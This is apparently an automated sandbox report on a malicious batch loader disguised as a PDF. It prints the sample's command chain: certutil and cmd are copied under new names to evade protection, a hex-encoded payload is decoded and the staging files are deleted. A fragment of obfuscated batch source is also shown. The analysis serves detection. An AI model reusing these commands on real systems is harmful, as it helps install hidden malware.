Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7CD4A7B4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6AA2A511C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7CD4A63FC
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4993B0 SetUnhandledExceptionFilter,4_2_00007FF7CD4993B0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7CD498FA4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4993B0 SetUnhandledExceptionFilter,6_2_00007FF7CD4993B0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7CD498FA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2F4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF6AA2F4E18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2F53E0 SetUnhandledExceptionFilter,7_2_00007FF6AA2F53E0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4993B0 SetUnhandledExceptionFilter,10_2_00007FF7CD4993B0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF7CD498FA4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4993B0 SetUnhandledExceptionFilter,11_2_00007FF7CD4993B0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD498FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7CD498FA4

HIPS / PFW / Operating System Protection Evasion

barindex
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF6AA2A7024
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA294AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA294AF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,7_2_00007FF6AA2A4E98
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7CD4951EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF7CD493140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF7CD4951EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF7CD493140
Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF6AA2F3800
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7CD4951EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF7CD493140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7CD4951EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7CD493140
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A8654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7CD4A8654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A6CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,7_2_00007FF6AA2A6CB4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48586C GetVersion,4_2_00007FF7CD48586C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF6AA20227C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF6AA21E568
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2054A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF6AA2054A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA225648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF6AA225648

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		Windows Management Instrumentation2
Valid Accounts		2
Valid Accounts		111
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services11
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		21
Access Token Manipulation		2
Valid Accounts		LSASS Memory2
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		11
Process Injection		2
Disable or Modify Tools		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		21
Access Token Manipulation		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials25
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Install Root Certificate		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Timestomp		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
DLL Side-Loading		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569105 Sample: 1x40 CONTAINER.PDF-.bat Startdate: 05/12/2024 Architecture: WINDOWS Score: 76 31 Malicious sample detected (through community Yara rule) 2->31 33 Found large BAT file 2->33 35 Sigma detected: Execution from Suspicious Folder 2->35 37 Sigma detected: Parent in Public Folder Suspicious Process 2->37 7 cmd.exe 1 2->7         started        process3 process4 9 extrac32.exe 1 7->9         started        13 alpha.exe 1 7->13         started        15 alpha.exe 1 7->15         started        17 4 other processes 7->17 file5 29 C:\Users\Public\alpha.exe, PE32+ 9->29 dropped 41 Drops PE files to the user root directory 9->41 43 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 9->43 45 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 9->45 19 kn.exe 3 1 13->19         started        22 extrac32.exe 1 15->22         started        25 kn.exe 1 17->25         started        signatures6 process7 file8 39 Registers a new ROOT certificate 19->39 27 C:\Users\Public\kn.exe, PE32+ 22->27 dropped signatures9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\alpha.exe0%ReversingLabs
C:\Users\Public\kn.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
    		high
    https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
      		high
      https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
        		high
        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
          		high
          https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
            		high
            https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
              		high
              https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                		high
                https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1569105
                  Start date and time:2024-12-05 13:22:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:1x40 CONTAINER.PDF-.bat
                  Detection:MAL
                  Classification:mal76.bank.evad.winBAT@20/8@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 205
                  Cookbook Comments:
                  • Found application associated with file extension: .bat

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • VT rate limit hit for: 1x40 CONTAINER.PDF-.bat

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\Public\alpha.exesaw.batGet hashmaliciousRemcos, DBatLoaderBrowse
                    A1 igazol#U00e1s.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                      Documentazione_Doganale_richieste_di_copia.cmdGet hashmaliciousDBatLoaderBrowse
                        78326473_PDF.cmdGet hashmaliciousDBatLoaderBrowse
                          iuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                            USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                  #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                    #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse

                                      Created / dropped Files

                                      C:\Users\Public\alpha.exe

                                      Download File
                                      Process:C:\Windows\System32\extrac32.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):289792
                                      Entropy (8bit):6.135598950357573
                                      Encrypted:false
                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: saw.bat, Detection: malicious, Browse
                                      • Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse
                                      • Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse
                                      • Filename: 78326473_PDF.cmd, Detection: malicious, Browse
                                      • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                      • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                      • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                      C:\Users\Public\kn.exe

                                      Download File
                                      Process:C:\Windows\System32\extrac32.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:modified
                                      Size (bytes):1651712
                                      Entropy (8bit):6.144018815244304
                                      Encrypted:false
                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                      \Device\Null

                                      Download File
                                      Process:C:\Users\Public\alpha.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):104
                                      Entropy (8bit):4.403504238247217
                                      Encrypted:false
                                      SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                      MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                      SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                      SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                      SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                      Malicious:false
                                      Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                      Static File Info

                                      General

                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                      Entropy (8bit):4.969115739297388
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                      • MP3 audio (1001/1) 33.33%
                                      File name:1x40 CONTAINER.PDF-.bat
                                      File size:3'675'586 bytes
                                      MD5:91f00c06e8cc61fe9239eefdb0dd0c03
                                      SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
                                      SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
                                      SHA512:fd8f0a8bedac0ca36d89e2ecbdf2ac445ff1ee4e0a298791b75bcfdf87d21dc5a71ea757b0ee4aeb82f29f55f839eb313f1fe15760e9612b80dbf5b4d326ca0a
                                      SSDEEP:49152:ZbnfQw2CN7WB0bIUvBafMtLz4Grc+UcqodC2W:E
                                      TLSH:C4064E9739BF1F87170E366B7F4BAB444A9ECC240A83DB8C42D611D8580B27F69F0959
                                      File Content Preview:..&@cls&@set "_..=Rfoc 7NDyWUq13FOX20QjaLIlwkg8VM9uiASHrCtTnKEedGYpZsP6B4zm@v5hJxb"..%_..:~57,1%%_..:~50,1%%_..:~44,1%%_..:~39,1%%_..:~4,1%"_....=%_..:~46,1%%_..:~15,1%%_..:~49,1%%_..:~0,1%%_..:~37,1%%_..:~42,1%%_..:~23,1%%_..:~40,1%%_..:~19,1%%_..:~60,1%

                                      File Icon

                                      Icon Hash:9686878b929a9886

                                      Network Behavior

                                      No network behavior found

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

